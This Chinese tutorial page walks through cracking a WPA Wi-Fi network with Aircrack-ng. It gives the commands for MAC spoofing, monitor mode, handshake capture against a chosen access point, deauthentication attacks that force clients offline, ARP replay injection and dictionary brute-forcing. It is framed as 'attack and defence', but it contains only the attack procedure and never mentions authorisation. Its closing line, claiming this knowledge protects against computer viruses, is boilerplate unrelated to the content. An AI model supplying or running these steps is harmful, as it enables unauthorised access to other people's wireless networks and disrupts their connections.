明辉手游网中心:是一个免费提供流行视频软件教程、在线学习分享的学习平台!

无线网攻防Aircrack -ng(抓包方式)

[摘要]1.修改mac地址信息。 ifconfig wlan0 down macchange -A wlan0 ifconfig wlan0 up2.监听 ai...

无线网攻防Aircrack -ng(抓包方式)

1.修改mac地址信息。

    ifconfig wlan0 down

     macchange -A wlan0

    ifconfig wlan0 up

2.监听

    airmon-ng start wlan0

3.抓包

    airodump-ng  mon0

    airodump-ng—w dota -c 10【信道】 - -bssid 5A-1F-CC-B1-A1:25 mon0(ctrl+c退出, 保留终端或者-w dota从而保存握手包cap,如果想针对某个客户端就加个 -c 客户端)

备注:airodump界面介绍:

    BSSID:ap的mac地址。

    PWR:信号强度, 如果PWR是-1说明网卡的驱动不支持报告信号水平。 如果是部分客户端的PWR为-1, 那么说明该客户端不在你网卡能监听到的范围内, 但是你能捕捉到AP发往该客户端的数据。

    BeaconsAP发出的通告编号, 每个接入点(AP)在最低速率(1M)时差不多每秒会发送10个左右的beacon, 所以它们能在很远的地方就被发现。

    #Data被捕获到的数据分组的数量(如果是WEP, 则代表唯一IV的数量), 包括广播分组。

    #/s过去10秒钟内每秒捕获数据分组的数量

    STATION:ap上面连接的用户。

    CH:信道

4.Deauth验证攻击:aireplay-ng -0 10 -a<ap mac> -c <ap对应的客户端mac> mon0【通过观察airmon-ng start mon0右上角查看握手包是否捕获到了。 如果不用-c那么所有的ap下客户端都掉线, 都被攻击。 】

参数解释:-0指的是采取Deautenticate攻击方式, 后面为发送次数;

                  -a ap mac

                  -c 客户端mac

注意:Deauth攻击往往并不是一次攻击就成功, 为确保成功截获需要反复进行(WPA破解不用等到数据Data达到几万, 因为它只要一个包含WPA4次握手验证包就可以了, 还有最好每操作一步新建一个窗口, 方便攻击时候查看数据情况从而确定握手包是否抓取成功。 )

deauth原理:强制让合法无线客户端与AP被断开, 当它被从WLAN 中断开后, 这个无线客户端会自动尝试重新连接到AP上, 在这个重新连接过程中, 数据通信就产生了, 然后利用airodump捕获一个无线路由器与无线客户端四次握手的过程, 生成一个包含四次握手的cap包。 然后再利用字典进行暴力。 如果deauth攻击不行, 或者没客户端没流量情况下, 可以通过注入攻击。

aireplay-ng -3 b ap mac -h 个人网卡地址 mon。

5.跑字典

aircrack-ng -w password.txt dota-*.cap(防止有时候-w记录不全, cap包用正则表达式方式引用最好。 )

备注:密码字典的生成最好是不同的类型的字典放在一个txt, 或者根据特性归类成不同的txt, 这样破解时候方便。


上面是电脑上网安全的一些基础常识,学习了安全知识,几乎可以让你免费电脑中毒的烦扰。